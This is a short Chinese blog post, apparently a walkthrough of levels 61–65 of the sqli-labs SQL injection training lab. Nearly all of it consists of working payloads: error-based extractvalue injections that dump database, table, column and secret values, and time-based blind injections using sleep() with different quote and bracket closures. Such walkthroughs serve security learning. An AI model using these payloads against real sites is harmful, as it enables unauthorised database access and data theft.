sqli-labs闯关之61-65关

最后五关!

第六十一关

和六十关基本一样,就是变成了单括号和双括号,这好像是第一次遇见双括号

爆数据库名   ?id=1'))and extractvalue(1, concat(0x5c, (select database())))%23

爆表名    ?id=0‘)) union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))%23

 

 

 爆列名       ?id=-1')) union select extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='73eg2fztqt'),0x7e))--+

 

 

 爆数据      ?id=-1')) union select extractvalue(1,concat(0x7e,(select group_concat(secret_BPYL) from 73eg2fztqt),0x7e))--+

 

 

输入(j6oVSqH7quRAqt1ywsF06Spm)进去后

BUG OFF YOU SILLY DUMB HACKER(滚开你这个愚蠢的黑客)

 

 

 

第六十二关

这关这次联合注入和报错注入都不可以了 ,那我们呢用盲注

?id=1%27)and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=79,0,sleep(3))--+

 

 

 

第六十三关

和六十二关基本一样,唯一区别在于需要使用单引号闭合

?id=0%27and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=77,0,sleep(10))--+
正确时间短,错误时间长

 

 

 

第六十四关

和六十二关基本一样,唯一区别在于需要使用括号闭合

?id=0))and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=77,0,sleep(10))--+
正确时间短,错误时间长

 

 

 

第六十五关

和六十二关基本一样,同上,只不过?id=1”) 正确延时

 ?id=1%22)and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=79,0,sleep(10))--+

 

 

结束!

 


 

posted @ 2020-02-16 21:29  escwq  阅读(381)  评论(0编辑  收藏  举报